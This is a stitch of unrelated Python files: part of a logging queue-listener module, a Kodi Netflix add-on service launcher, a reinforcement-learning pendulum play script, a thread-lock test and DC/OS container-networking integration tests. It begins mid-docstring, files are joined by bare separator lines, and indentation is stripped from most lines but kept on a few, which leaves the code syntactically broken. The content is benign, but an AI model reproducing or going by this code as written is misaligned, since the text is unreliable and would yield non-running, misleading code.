of the record while leaving the original intact.
"""
# The format operation gets traceback text into record.exc_text
# (if there's exception data), and also returns the formatted
# message. We can then use this to replace the original
# msg + args, as these might be unpickleable. We also zap the
# exc_info and exc_text attributes, as they are no longer
# needed and, if not None, will typically not be pickleable.
msg = self.format(record)
record.message = msg
record.msg = msg
record.args = None
record.exc_info = None
record.exc_text = None
return record
def emit(self, record):
"""
Emit a record.
Writes the LogRecord to the queue, preparing it for pickling first.
"""
try:
self.enqueue(self.prepare(record))
except Exception:
self.handleError(record)
class QueueListener(object):
"""
This class implements an internal threaded listener which watches for
LogRecords being added to a queue, removes them and passes them to a
list of handlers for processing.
"""
_sentinel = None
def __init__(self, queue, *handlers, respect_handler_level=False):
"""
Initialise an instance with the specified queue and
handlers.
"""
self.queue = queue
self.handlers = handlers
self._thread = None
self.respect_handler_level = respect_handler_level
def dequeue(self, block):
"""
Dequeue a record and return it, optionally blocking.
The base implementation uses get. You may want to override this method
if you want to use timeouts or work with custom queue implementations.
"""
return self.queue.get(block)
def start(self):
"""
Start the listener.
This starts up a background thread to monitor the queue for
LogRecords to process.
"""
self._thread = t = threading.Thread(target=self._monitor)
t.daemon = True
t.start()
    def prepare(self, record):
"""
Prepare a record for handling.
This method just returns the passed-in record. You may want to
override this method if you need to do any custom marshalling or
manipulation of the record before passing it to the handlers.
"""
return record
def handle(self, record):
"""
Handle a record.
This just loops through the handlers offering them the record
to handle.
"""
record = self.prepare(record)
for handler in self.handlers:
if not self.respect_handler_level:
process = True
else:
process = record.levelno >= handler.level
if process:
handler.handle(record)
def _monitor(self):
"""
Monitor the queue for records, and ask the handler
to deal with them.
This method runs on a separate, internal thread.
The thread will terminate if it sees a sentinel object in the queue.
"""
q = self.queue
has_task_done = hasattr(q, 'task_done')
while True:
try:
record = self.dequeue(True)
if record is self._sentinel:
break
self.handle(record)
if has_task_done:
q.task_done()
except queue.Empty:
break
def enqueue_sentinel(self):
"""
This is used to enqueue the sentinel record.
The base implementation uses put_nowait. You may want to override this
method if you want to use timeouts or work with custom queue
implementations.
"""
self.queue.put_nowait(self._sentinel)
def stop(self):
"""
Stop the listener.
This asks the thread to terminate, and then waits for it to do so.
Note that if you don't call this before your application exits, there
may be some records still left on the queue, which won't be processed.
"""
self.enqueue_sentinel()
self._thread.join()
self._thread = None
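# A minimal end-to-end sketch of the queue-based pattern described above (the logger
# and queue names are illustrative): producers log through a QueueHandler while a single
# QueueListener thread drains the queue and hands records to the real handlers, keeping
# slow I/O off the producers' threads.
def _example_queue_logging():
    import logging
    import queue as _queue
    q = _queue.Queue(-1)                      # unbounded queue
    listener = QueueListener(q, logging.StreamHandler(),
                             respect_handler_level=True)
    listener.start()
    logger = logging.getLogger('example.app')
    logger.addHandler(QueueHandler(q))
    logger.setLevel(logging.INFO)
    logger.info('hello from the producer side')
    listener.stop()                           # enqueues the sentinel and joins the thread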
|
run_service.py
|
# -*- coding: utf-8 -*-
"""
Copyright (C) 2017 Sebastian Golasch (plugin.video.netflix)
Functions for starting the service
SPDX-License-Identifier: MIT
See LICENSES/MIT.md for more information.
"""
import threading
from socket import gaierror
from resources.lib.common import select_port, get_local_string, WndHomeProps
from resources.lib.globals import G
from resources.lib.upgrade_controller import check_service_upgrade
from resources.lib.utils.logging import LOG
class NetflixService:
"""
Netflix addon service
"""
SERVERS = []
HOST_ADDRESS = '127.0.0.1'
def __init__(self):
self.controller = None
self.library_updater = None
def init_servers(self):
"""Initialize the http servers"""
try:
# Import modules here to intercept possible missing libraries on linux systems
from resources.lib.services.msl.http_server import MSLTCPServer
from resources.lib.services.nfsession.http_server import NetflixTCPServer
from resources.lib.services.cache.http_server import CacheTCPServer
# Do not change the init order of the servers,
# MSLTCPServer must always be initialized first to get the DRM info
self.SERVERS = [
{
'name': 'MSL',
'class': MSLTCPServer,
'instance': None,
'thread': None
}, {
'name': 'NS',
'class': NetflixTCPServer,
'instance': None,
'thread': None
}, {
'name': 'CACHE',
'class': CacheTCPServer,
'instance': None,
'thread': None
}
]
for server in self.SERVERS:
self._init_server(server)
return True
except Exception as exc: # pylint: disable=broad-except
            LOG.error('Background services could not be started due to the following error')
import traceback
LOG.error(traceback.format_exc())
if isinstance(exc, gaierror):
                message = ('Something is wrong with your network localhost configuration.\r\n'
                           'It is possible that the hostname {} cannot be resolved.').format(self.HOST_ADDRESS)
elif isinstance(exc, ImportError):
                message = ('Your system is missing a library required to run Netflix.\r\n'
'Read how to install the add-on in the GitHub Readme.\r\n'
'Error details: {}'.format(exc))
else:
message = str(exc)
self._set_service_status('error', message)
return False
def _init_server(self, server):
server['class'].allow_reuse_address = True
server['instance'] = server['class'](
(self.HOST_ADDRESS, select_port(server['name']))
)
server['thread'] = threading.Thread(target=server['instance'].serve_forever)
def start_services(self):
"""
Start the background services
"""
from resources.lib.services.playback.action_controller import ActionController
from resources.lib.services.library_updater import LibraryUpdateService
for server in self.SERVERS:
server['instance'].server_activate()
server['instance'].timeout = 1
server['thread'].start()
LOG.info('[{}] Thread started'.format(server['name']))
self.controller = ActionController()
self.library_updater = LibraryUpdateService()
# We reset the value in case of any eventuality (add-on disabled, update, etc)
WndHomeProps[WndHomeProps.CURRENT_DIRECTORY] = None
# Mark the service as active
self._set_service_status('running')
if not G.ADDON.getSettingBool('disable_startup_notification'):
from resources.lib.kodi.ui import show_notification
show_notification(get_local_string(30110))
def shutdown(self):
"""
Stop the background services
"""
self._set_service_status('stopped')
for server in self.SERVERS:
server['instance'].shutdown()
server['instance'].server_close()
server['instance'] = None
server['thread'].join()
server['thread'] = None
LOG.info('Stopped MSL Service')
def run(self):
"""Main loop. Runs until xbmc.Monitor requests abort"""
try:
self.start_services()
except Exception as exc: # pylint: disable=broad-except
self._set_service_status('stopped')
import traceback
from resources.lib.kodi.ui import show_addon_error_info
LOG.error(traceback.format_exc())
show_addon_error_info(exc)
return
while not self.controller.abortRequested():
if self._tick_and_wait_for_abort():
break
self.shutdown()
def _tick_and_wait_for_abort(self):
try:
self.controller.on_service_tick()
self.library_updater.on_service_tick()
G.CACHE_MANAGEMENT.on_service_tick()
except Exception as exc: # pylint: disable=broad-except
import traceback
from resources.lib.kodi.ui import show_notification
LOG.error(traceback.format_exc())
show_notification(': '.join((exc.__class__.__name__, str(exc))))
return self.controller.waitForAbort(1)
def _set_service_status(self, status, message=None):
"""Save the service status to a Kodi property"""
from json import dumps
status = {'status': status, 'message': message}
WndHomeProps[WndHomeProps.SERVICE_STATUS] = dumps(status)
def run(argv):
# Initialize globals right away to avoid stale values from the last addon invocation.
# Otherwise Kodi's reuseLanguageInvoker will cause some really quirky behavior!
# PR: https://github.com/xbmc/xbmc/pull/13814
G.init_globals(argv)
check_service_upgrade()
netflix_service = NetflixService()
if netflix_service.init_servers():
netflix_service.run()
|
play.py
|
# https://github.com/openai/gym/blob/master/gym/envs/classic_control/pendulum.py
# https://mspries.github.io/jimmy_pendulum.html
#!/usr/bin/env python3
import math
import time
import grpc
import torch
import os, sys
import numpy as np
current_path = os.path.dirname(os.path.realpath(__file__))
PROJECT_HOME = os.path.abspath(os.path.join(current_path, os.pardir, os.pardir))
if PROJECT_HOME not in sys.path:
sys.path.append(PROJECT_HOME)
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))))
print("PyTorch Version", torch.__version__)
os.environ['KMP_DUPLICATE_LIB_OK'] = 'True'
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
from codes.c_models.continuous_action.continuous_action_model import ContinuousActionModel
from codes.e_utils.reward_changer import RewardChanger
from codes.e_utils import rl_utils
from codes.e_utils.common_utils import load_model, map_range
from codes.e_utils.logger import get_logger
from codes.e_utils.names import EnvironmentName, AgentMode
from codes.e_utils.rl_utils import get_environment_input_output_info, MODEL_ZOO_SAVE_DIR, MODEL_SAVE_FILE_PREFIX
from codes.b_environments.quanser_rotary_inverted_pendulum import blender_service_pb2_grpc
from codes.b_environments.quanser_rotary_inverted_pendulum.blender_service_pb2 import BlenderRequest
my_logger = get_logger("openai_pendulum_ddpg")
def play_main(params, env):
observation_shape, action_shape, num_outputs, action_n, action_min, action_max = get_environment_input_output_info(
env
)
agent = rl_utils.get_rl_agent(
observation_shape, action_shape, num_outputs, action_n, action_min, action_max, worker_id=-1, params=params, device=device
)
load_model(MODEL_ZOO_SAVE_DIR, MODEL_SAVE_FILE_PREFIX, agent, inquery=False)
agent.agent_mode = AgentMode.PLAY
agent.model.eval()
agent.test_model.load_state_dict(agent.model.state_dict())
agent.test_model.eval()
num_step = 0
num_episode = 0
while True:
done = False
episode_reward = 0
if "Bullet" in params.ENVIRONMENT_ID.value:
env.render()
state = env.reset()
num_episode += 1
num_episode_step = 0
agent_state = rl_utils.initial_agent_state()
while not done:
env.render()
num_step += 1
num_episode_step += 1
state = np.expand_dims(state, axis=0)
            action, agent_state = agent(state, agent_state)
if isinstance(agent.model, ContinuousActionModel):
action = map_range(
np.asarray(action),
np.ones_like(agent.action_min) * -1.0, np.ones_like(agent.action_max),
agent.action_min, agent.action_max
)
if action.ndim == 2:
action = action[0]
next_state, reward, done, info = env.step(action)
if isinstance(env, RewardChanger):
reward = env.reverse_reward(reward)
episode_reward += reward
state = next_state
# if num_step % 1000 == 0:
# print("EPISODE: {0}, EPISODE STEPS: {1}, TOTAL STEPS: {2}".format(
# num_episode, num_episode_step, num_step
# ))
if params.ENVIRONMENT_ID not in [
EnvironmentName.PENDULUM_MATLAB_V0,
EnvironmentName.PENDULUM_MATLAB_DOUBLE_RIP_V0,
EnvironmentName.REAL_DEVICE_RIP,
EnvironmentName.REAL_DEVICE_DOUBLE_RIP,
EnvironmentName.QUANSER_SERVO_2
]:
time.sleep(0.01)
print("EPISODE: {0}, EPISODE STEPS: {1}, TOTAL STEPS: {2}, EPISODE DONE --> EPISODE REWARD: {3}".format(
num_episode, num_episode_step, num_step, episode_reward
))
time.sleep(0.1)
def quanser_blender(server_obj_blender, idx, env):
while True:
blender_response = server_obj_blender.step_blender(BlenderRequest(
idx=idx, pendulum_1_radian=math.degrees(env.pendulum_radian), motor_radian=math.degrees(env.motor_radian),
pendulum_2_radian=0
))
if not blender_response.is_receive:
raise ValueError()
time.sleep(0.005)
def rip_blender(server_obj_blender, idx, env):
while True:
blender_response = server_obj_blender.step_blender(BlenderRequest(
idx=idx, pendulum_1_radian=math.degrees(env.pendulum_1_position),
motor_radian=math.degrees(env.motor_position),
pendulum_2_radian=math.degrees(env.pendulum_2_position)
))
if not blender_response.is_receive:
raise ValueError()
time.sleep(0.001)
if __name__ == "__main__":
from codes.a_config.parameters import PARAMETERS as parameters
params = parameters
env = rl_utils.get_single_environment(params=params, mode=AgentMode.PLAY)
print("env:", params.ENVIRONMENT_ID)
print("observation_space:", env.observation_space)
print("action_space:", env.action_space)
if params.ENVIRONMENT_ID in [EnvironmentName.QUANSER_SERVO_2, EnvironmentName.REAL_DEVICE_RIP,
EnvironmentName.REAL_DEVICE_DOUBLE_RIP]:
import threading
if params.SERVER_IDX == 1:
RIP_SERVER = '10.42.0.201'
IDX = 0
elif params.SERVER_IDX == 2:
RIP_SERVER = '10.42.0.222'
IDX = 1
elif params.SERVER_IDX == 3:
RIP_SERVER = '10.42.0.219'
IDX = 2
elif params.SERVER_IDX == 4:
RIP_SERVER = '192.168.0.32'
IDX = 4
elif params.SERVER_IDX == 5:
RIP_SERVER = '192.168.0.34'
IDX = 3
channel_blender = grpc.insecure_channel('{0}:50051'.format('192.168.0.5'))
server_obj_blender = blender_service_pb2_grpc.BlenderRIPStub(channel_blender)
if params.SERVER_IDX == 4 or params.SERVER_IDX == 5:
quanser_blender_start = threading.Thread(target=quanser_blender, args=(server_obj_blender, IDX, env))
quanser_blender_start.start()
elif params.SERVER_IDX == 1 or params.SERVER_IDX == 2 or params.SERVER_IDX == 3:
rip_blender_start = threading.Thread(target=rip_blender, args=(server_obj_blender, IDX, env))
rip_blender_start.start()
play_main(params, env)
|
test_sharedmodel.py
|
import time
import threading
def acquire_and_keep(s):
with s:
time.sleep(1)
class TestSharedModel:
def test_wait_if_locked(self, init_shared_model):
"""
        Check if a thread has to wait if the model is
already in use.
"""
s = init_shared_model("TEST", "TEST")
        t1 = threading.Thread(target=acquire_and_keep, args=(s,))
        t2 = threading.Thread(target=acquire_and_keep, args=(s,))
t1.start()
t2.start()
assert t2.is_alive()
def test_acquire_after_unlocked(self, init_shared_model):
"""
Check if the model can be acquired after it's been
unlocked.
"""
s = init_shared_model("TEST", "TEST")
        t1 = threading.Thread(target=acquire_and_keep, args=(s,))
t1.start()
model = s.acquire_model()
assert model == "TEST"
|
test_networking.py
|
import contextlib
import enum
import itertools
import json
import logging
import subprocess
import threading
import time
import uuid
from collections import deque
import pytest
import requests
import retrying
import test_helpers
from dcos_test_utils import marathon
from dcos_test_utils.helpers import assert_response_ok
__maintainer__ = 'urbanserj'
__contact__ = 'dcos-networking@mesosphere.io'
log = logging.getLogger(__name__)
GLOBAL_PORT_POOL = iter(range(10000, 32000))
GLOBAL_OCTET_POOL = itertools.cycle(range(254, 10, -1))
class Container(enum.Enum):
POD = 'POD'
class MarathonApp:
def __init__(self, container, network, host,
vip=None, network_name=None,
app_name_fmt=None, host_port=None):
if host_port is None:
host_port = unused_port()
args = {
'app_name_fmt': app_name_fmt,
'network': network,
'host_port': host_port,
'host_constraint': host,
'vip': vip,
'container_type': container,
'healthcheck_protocol': marathon.Healthcheck.MESOS_HTTP
}
if network == marathon.Network.USER:
args['container_port'] = unused_port()
if network_name is not None:
args['network_name'] = network_name
if vip is not None:
del args['host_port']
self.app, self.uuid = test_helpers.marathon_test_app(**args)
# allow this app to run on public slaves
self.app['acceptedResourceRoles'] = ['*', 'slave_public']
self.id = self.app['id']
def __str__(self):
return str(self.app)
def deploy(self, dcos_api_session):
return dcos_api_session.marathon.post('/v2/apps', json=self.app).raise_for_status()
@retrying.retry(
wait_fixed=5000,
stop_max_delay=20 * 60 * 1000)
def wait(self, dcos_api_session):
r = dcos_api_session.marathon.get('/v2/apps/{}'.format(self.id))
assert_response_ok(r)
self._info = r.json()
assert self._info['app']['tasksHealthy'] == self.app['instances']
def info(self, dcos_api_session):
try:
if self._info['app']['tasksHealthy'] != self.app['instances']:
raise Exception("Number of Healthy Tasks not equal to number of instances.")
except Exception:
self.wait(dcos_api_session)
return self._info
def hostport(self, dcos_api_session):
info = self.info(dcos_api_session)
task = info['app']['tasks'][0]
if 'networks' in self.app and \
self.app['networks'][0]['mode'] == 'container' and \
self.app['networks'][0]['name'] == 'dcos':
host = task['ipAddresses'][0]['ipAddress']
port = self.app['container']['portMappings'][0]['containerPort']
else:
host = task['host']
port = task['ports'][0]
return host, port
def purge(self, dcos_api_session):
return dcos_api_session.marathon.delete('/v2/apps/{}'.format(self.id))
class MarathonPod:
def __init__(self, network, host, vip=None, pod_name_fmt='/integration-test-{}'):
self._network = network
container_port = 0
if network is not marathon.Network.HOST:
container_port = unused_port()
# ENDPOINT_TEST will be computed from the `endpoints` definition. See [1], [2]
# [1] https://dcos.io/docs/1.10/deploying-services/pods/technical-overview/#environment-variables
# [2] https://github.com/mesosphere/marathon/blob/v1.5.0/
# src/main/scala/mesosphere/mesos/TaskGroupBuilder.scala#L420-L443
port = '$ENDPOINT_TEST' if network == marathon.Network.HOST else container_port
self.uuid = uuid.uuid4().hex
self.id = pod_name_fmt.format(self.uuid)
self.app = {
'id': self.id,
'scheduling': {'placement': {'acceptedResourceRoles': ['*', 'slave_public']}},
'containers': [{
'name': 'app-{}'.format(self.uuid),
'resources': {'cpus': 0.01, 'mem': 32},
'image': {'kind': 'DOCKER', 'id': 'debian:stretch-slim'},
'exec': {'command': {
'shell': '/opt/mesosphere/bin/dcos-shell python '
'/opt/mesosphere/active/dcos-integration-test/util/python_test_server.py '
'{}'.format(port)
}},
'volumeMounts': [{'name': 'opt', 'mountPath': '/opt/mesosphere'}],
'endpoints': [{'name': 'test', 'protocol': ['tcp'], 'hostPort': unused_port()}],
'environment': {'DCOS_TEST_UUID': self.uuid, 'HOME': '/'}
}],
'networks': [{'mode': 'host'}],
'volumes': [{'name': 'opt', 'host': '/opt/mesosphere'}]
}
if host is not None:
self.app['scheduling']['placement']['constraints'] = \
[{'fieldName': 'hostname', 'operator': 'CLUSTER', 'value': host}]
if vip is not None:
self.app['containers'][0]['endpoints'][0]['labels'] = \
{'VIP_0': vip}
if network == marathon.Network.USER:
del self.app['containers'][0]['endpoints'][0]['hostPort']
self.app['containers'][0]['endpoints'][0]['containerPort'] = container_port
self.app['networks'] = [{'name': 'dcos', 'mode': 'container'}]
elif network == marathon.Network.BRIDGE:
self.app['containers'][0]['endpoints'][0]['containerPort'] = container_port
self.app['networks'] = [{'mode': 'container/bridge'}]
def __str__(self):
return str(self.app)
def deploy(self, dcos_api_session):
return dcos_api_session.marathon.post('/v2/pods', json=self.app).raise_for_status()
@retrying.retry(
wait_fixed=5000,
stop_max_delay=20 * 60 * 1000,
retry_on_result=lambda res: res is False)
def wait(self, dcos_api_session):
r = dcos_api_session.marathon.get('/v2/pods/{}::status'.format(self.id))
assert_response_ok(r)
self._info = r.json()
error_msg = 'Status was {}: {}'.format(self._info['status'], self._info.get('message', 'no message'))
assert self._info['status'] == 'STABLE', error_msg
def info(self, dcos_api_session):
try:
if self._info['status'] != 'STABLE':
raise Exception("The status information is not Stable!")
except Exception:
self.wait(dcos_api_session)
return self._info
def hostport(self, dcos_api_session):
info = self.info(dcos_api_session)
if self._network == marathon.Network.USER:
host = info['instances'][0]['networks'][0]['addresses'][0]
port = self.app['containers'][0]['endpoints'][0]['containerPort']
else:
host = info['instances'][0]['agentHostname']
port = info['instances'][0]['containers'][0]['endpoints'][0]['allocatedHostPort']
return host, port
def purge(self, dcos_api_session):
return dcos_api_session.marathon.delete('/v2/pods/{}'.format(self.id))
def unused_port():
global GLOBAL_PORT_POOL
return next(GLOBAL_PORT_POOL)
def unused_octet():
global GLOBAL_OCTET_POOL
return next(GLOBAL_OCTET_POOL)
def lb_enabled():
expanded_config = test_helpers.get_expanded_config()
return expanded_config['enable_lb'] == 'true'
@retrying.retry(wait_fixed=2000,
stop_max_delay=5 * 60 * 1000,
retry_on_result=lambda ret: ret is None)
def ensure_routable(cmd, host, port, json_output=True):
proxy_uri = 'http://{}:{}/run_cmd'.format(host, port)
log.info('Sending {} data: {}'.format(proxy_uri, cmd))
response = requests.post(proxy_uri, data=cmd, timeout=5).json()
log.info('Requests Response: {}'.format(repr(response)))
if response['status'] != 0:
return None
return json.loads(response['output']) if json_output else response['output']
def generate_vip_app_permutations():
""" Generate all possible network interface permutations for applying vips
"""
containers = list(marathon.Container) + [Container.POD]
return [(container, vip_net, proxy_net)
for container in containers
for vip_net in list(marathon.Network)
for proxy_net in list(marathon.Network)]
def workload_test(dcos_api_session, container, app_net, proxy_net, ipv6, same_host):
(vip, hosts, cmd, origin_app, proxy_app, _pm_app) = \
vip_workload_test(dcos_api_session, container,
app_net, proxy_net, ipv6, True, same_host, False)
return (hosts, origin_app, proxy_app)
@pytest.mark.first
def test_docker_image_availability():
assert test_helpers.docker_pull_image("debian:stretch-slim"), "docker pull failed for image used in the test"
@pytest.mark.slow
@pytest.mark.parametrize('same_host', [True, False])
def test_ipv6(dcos_api_session, same_host):
''' Testing autoip, containerip and *.mesos FQDN on ipv6 overlay network '''
(hosts, origin_app, proxy_app) = \
workload_test(dcos_api_session, marathon.Container.DOCKER,
marathon.Network.USER, marathon.Network.USER, True, same_host)
log.info('Starting apps :: Hosts: {}'.format(hosts))
log.info("Origin app: {}".format(origin_app))
origin_app.deploy(dcos_api_session)
log.info("Proxy app: {}".format(proxy_app))
proxy_app.deploy(dcos_api_session)
origin_app.wait(dcos_api_session)
proxy_app.wait(dcos_api_session)
log.info('Apps are ready')
origin_app_info = origin_app.info(dcos_api_session)
origin_port = origin_app_info['app']['container']['portMappings'][0]['containerPort']
proxy_host, proxy_port = proxy_app.hostport(dcos_api_session)
dns_name = '-'.join(reversed(origin_app.id.split('/')[1:]))
try:
zones = ["marathon.autoip.dcos.thisdcos.directory",
"marathon.containerip.dcos.thisdcos.directory",
"marathon.mesos"]
for zone in zones:
cmd = '{} --ipv6 http://{}/test_uuid'.format(
'/opt/mesosphere/bin/curl -s -f -m 5',
'{}.{}:{}'.format(dns_name, zone, origin_port))
log.info("Remote command: {}".format(cmd))
assert ensure_routable(cmd, proxy_host, proxy_port)['test_uuid'] == origin_app.uuid
finally:
log.info('Purging application: {}'.format(origin_app.id))
origin_app.purge(dcos_api_session)
log.info('Purging application: {}'.format(proxy_app.id))
proxy_app.purge(dcos_api_session)
@pytest.mark.slow
def test_vip_ipv6(dcos_api_session):
return test_vip(dcos_api_session, marathon.Container.DOCKER,
marathon.Network.USER, marathon.Network.USER, ipv6=True)
@pytest.mark.slow
@pytest.mark.parametrize(
'container',
list(marathon.Container))
def test_vip_port_mapping(dcos_api_session,
container: marathon.Container,
vip_net: marathon.Network=marathon.Network.HOST,
proxy_net: marathon.Network=marathon.Network.HOST):
return test_vip(dcos_api_session, container, vip_net, proxy_net, with_port_mapping_app=True)
@pytest.mark.slow
@pytest.mark.parametrize(
'container,vip_net,proxy_net',
generate_vip_app_permutations())
def test_vip(dcos_api_session,
container: marathon.Container,
vip_net: marathon.Network,
proxy_net: marathon.Network,
ipv6: bool=False,
with_port_mapping_app=False):
'''Test VIPs between the following source and destination configurations:
* containers: DOCKER, UCR and NONE
* networks: USER, BRIDGE, HOST
    * agents: source and destinations on same agent or different agents
* vips: named and unnamed vip
Origin app will be deployed to the cluster with a VIP. Proxy app will be
deployed either to the same host or elsewhere. Finally, a thread will be
started on localhost (which should be a master) to submit a command to the
proxy container that will ping the origin container VIP and then assert
that the expected origin app UUID was returned
'''
if not lb_enabled():
pytest.skip('Load Balancer disabled')
errors = []
tests = setup_vip_workload_tests(dcos_api_session, container, vip_net, proxy_net, ipv6, with_port_mapping_app)
for vip, hosts, cmd, origin_app, proxy_app, pm_app in tests:
log.info("Testing :: VIP: {}, Hosts: {}".format(vip, hosts))
log.info("Remote command: {}".format(cmd))
proxy_host, proxy_port = proxy_app.hostport(dcos_api_session)
try:
if ipv6 and len(hosts) < 2:
# NOTE: If proxy and origin apps run on the same host, IPv6 VIP works from
# proxy task's network namespace only when bridge-nf-call-ip6tables is enabled, i.e
# sysctl -w net.bridge.bridge-nf-call-ip6tables=1
# JIRA: https://jira.mesosphere.com/browse/DCOS_OSS-5122
continue
assert ensure_routable(cmd, proxy_host, proxy_port)['test_uuid'] == origin_app.uuid
except Exception as e:
log.error('Exception: {}'.format(e))
errors.append(e)
finally:
log.info('Purging application: {}'.format(origin_app.id))
origin_app.purge(dcos_api_session)
log.info('Purging application: {}'.format(proxy_app.id))
proxy_app.purge(dcos_api_session)
if pm_app is not None:
log.info('Purging application: {}'.format(pm_app.id))
pm_app.purge(dcos_api_session)
assert not errors
def setup_vip_workload_tests(dcos_api_session, container, vip_net, proxy_net, ipv6, with_port_mapping_app=False):
same_hosts = [True, False] if len(dcos_api_session.all_slaves) > 1 else [True]
tests = [vip_workload_test(dcos_api_session, container, vip_net, proxy_net,
ipv6, named_vip, same_host, with_port_mapping_app)
for named_vip in [True, False]
for same_host in same_hosts]
for vip, hosts, cmd, origin_app, proxy_app, pm_app in tests:
# We do not need the service endpoints because we have deterministically assigned them
log.info('Starting apps :: VIP: {}, Hosts: {}'.format(vip, hosts))
log.info("Origin app: {}".format(origin_app))
origin_app.deploy(dcos_api_session)
log.info("Proxy app: {}".format(proxy_app))
proxy_app.deploy(dcos_api_session)
if pm_app is not None:
log.info("Port Mapping app: {}".format(pm_app))
pm_app.deploy(dcos_api_session)
for vip, hosts, cmd, origin_app, proxy_app, pm_app in tests:
log.info("Deploying apps :: VIP: {}, Hosts: {}".format(vip, hosts))
log.info('Deploying origin app: {}'.format(origin_app.id))
origin_app.wait(dcos_api_session)
log.info('Deploying proxy app: {}'.format(proxy_app.id))
proxy_app.wait(dcos_api_session)
if pm_app is not None:
log.info("Deploying port mapping app: {}".format(pm_app))
pm_app.wait(dcos_api_session)
log.info('Apps are ready')
return tests
def vip_workload_test(dcos_api_session, container, vip_net, proxy_net, ipv6,
named_vip, same_host, with_port_mapping_app):
slaves = dcos_api_session.slaves + dcos_api_session.public_slaves
vip_port = unused_port()
origin_host = slaves[0]
proxy_host = slaves[0] if same_host else slaves[1]
if named_vip:
label = str(uuid.uuid4())
vip = '/{}:{}'.format(label, vip_port)
vipaddr = '{}.marathon.l4lb.thisdcos.directory:{}'.format(label, vip_port)
elif ipv6:
vip_ip = 'fd01:c::{}'.format(unused_octet())
vip = '{}:{}'.format(vip_ip, vip_port)
vipaddr = '[{}]:{}'.format(vip_ip, vip_port)
else:
vip = '198.51.100.{}:{}'.format(unused_octet(), vip_port)
vipaddr = vip
cmd = '{} {} http://{}/test_uuid'.format(
'/opt/mesosphere/bin/curl -s -f -m 5',
'--ipv6' if ipv6 else '--ipv4',
vipaddr)
path_id = '/integration-tests/{}-{}-{}'.format(
enum2str(container),
net2str(vip_net, ipv6),
net2str(proxy_net, ipv6))
test_case_id = '{}-{}'.format(
'named' if named_vip else 'vip',
'local' if same_host else 'remote')
# NOTE: DNS label can't be longer than 63 bytes
origin_fmt = '{}/app-{}'.format(path_id, test_case_id)
origin_fmt = origin_fmt + '-{{:.{}}}'.format(63 - len(origin_fmt))
proxy_fmt = '{}/proxy-{}'.format(path_id, test_case_id)
proxy_fmt = proxy_fmt + '-{{:.{}}}'.format(63 - len(proxy_fmt))
network_name = 'dcos6' if ipv6 else 'dcos' # it is used for user network mode only
if container == Container.POD:
origin_app = MarathonPod(vip_net, origin_host, vip, pod_name_fmt=origin_fmt)
proxy_app = MarathonPod(proxy_net, proxy_host, pod_name_fmt=proxy_fmt)
else:
origin_app = MarathonApp(container, vip_net, origin_host, vip,
network_name=network_name, app_name_fmt=origin_fmt)
proxy_app = MarathonApp(container, proxy_net, proxy_host,
network_name=network_name, app_name_fmt=proxy_fmt)
    # Port mapping application runs on `proxy_host` and has the `host_port` same as `vip_port`.
pm_fmt = '{}/pm-{}'.format(path_id, test_case_id)
pm_fmt = pm_fmt + '-{{:.{}}}'.format(63 - len(pm_fmt))
if with_port_mapping_app:
pm_container = Container.MESOS if container == Container.POD else container
pm_app = MarathonApp(pm_container, marathon.Network.BRIDGE, proxy_host, host_port=vip_port, app_name_fmt=pm_fmt)
else:
pm_app = None
hosts = list(set([origin_host, proxy_host]))
return (vip, hosts, cmd, origin_app, proxy_app, pm_app)
@retrying.retry(wait_fixed=2000,
stop_max_delay=120 * 1000,
retry_on_exception=lambda x: True)
def test_if_overlay_ok(dcos_api_session):
def _check_overlay(hostname, port):
overlays = dcos_api_session.get('/overlay-agent/overlay', host=hostname, port=port).json()['overlays']
assert len(overlays) > 0
for overlay in overlays:
assert overlay['state']['status'] == 'STATUS_OK'
for master in dcos_api_session.masters:
_check_overlay(master, 5050)
for slave in dcos_api_session.all_slaves:
_check_overlay(slave, 5051)
def test_if_dcos_l4lb_disabled(dcos_api_session):
'''Test to make sure dcos_l4lb is disabled'''
if lb_enabled():
pytest.skip('Load Balancer enabled')
data = subprocess.check_output(['/usr/bin/env', 'ip', 'rule'])
# dcos-net creates this ip rule: `9999: from 9.0.0.0/8 lookup 42`
# We check it doesn't exist
assert str(data).find('9999') == -1
def test_ip_per_container(dcos_api_session):
'''Test if we are able to connect to a task with ip-per-container mode
'''
# Launch the test_server in ip-per-container mode (user network)
if len(dcos_api_session.slaves) < 2:
pytest.skip("IP Per Container tests require 2 private agents to work")
app_definition, test_uuid = test_helpers.marathon_test_app(
healthcheck_protocol=marathon.Healthcheck.MESOS_HTTP,
container_type=marathon.Container.DOCKER,
network=marathon.Network.USER,
host_port=9080)
app_definition['instances'] = 2
app_definition['constraints'] = [['hostname', 'UNIQUE']]
with dcos_api_session.marathon.deploy_and_cleanup(app_definition, check_health=True):
service_points = dcos_api_session.marathon.get_app_service_endpoints(app_definition['id'])
app_port = app_definition['container']['portMappings'][0]['containerPort']
cmd = '/opt/mesosphere/bin/curl -s -f -m 5 http://{}:{}/ping'.format(service_points[1].ip, app_port)
ensure_routable(cmd, service_points[0].host, service_points[0].port)
@pytest.mark.parametrize('networking_mode', list(marathon.Network))
@pytest.mark.parametrize('host_port', [9999, 0])
def test_app_networking_mode_with_defined_container_port(dcos_api_session, networking_mode, host_port):
"""
The Admin Router can proxy a request on the `/service/[app]`
    endpoint to an application running in a container in different networking
    modes, with a manually or automatically assigned host port on which
    the application's HTTP endpoint is exposed.
    The following networking modes are tested:
- host
- container
- container/bridge
https://mesosphere.github.io/marathon/docs/networking.html#networking-modes
"""
app_definition, test_uuid = test_helpers.marathon_test_app(
healthcheck_protocol=marathon.Healthcheck.MESOS_HTTP,
container_type=marathon.Container.DOCKER,
network=networking_mode,
host_port=host_port)
dcos_service_name = uuid.uuid4().hex
app_definition['labels'] = {
'DCOS_SERVICE_NAME': dcos_service_name,
'DCOS_SERVICE_PORT_INDEX': '0',
'DCOS_SERVICE_SCHEME': 'http',
}
# Arbitrary buffer time, accounting for propagation/processing delay.
buffer_time = 5
# Cache refresh in Adminrouter takes 30 seconds at most.
# CACHE_POLL_PERIOD=25s + valid=5s Nginx resolver DNS entry TTL
# https://github.com/dcos/dcos/blob/cb9105ee537cc44cbe63cc7c53b3b01b764703a0/
# packages/adminrouter/extra/src/includes/http/master.conf#L21
adminrouter_default_refresh = 25 + 5 + buffer_time
app_id = app_definition['id']
app_instances = app_definition['instances']
app_definition['constraints'] = [['hostname', 'UNIQUE']]
# For the routing check to work, two conditions must be true:
#
# 1. The application must be deployed, so that `/ping` responds with 200.
# 2. The Admin Router routing layer must not be using an outdated
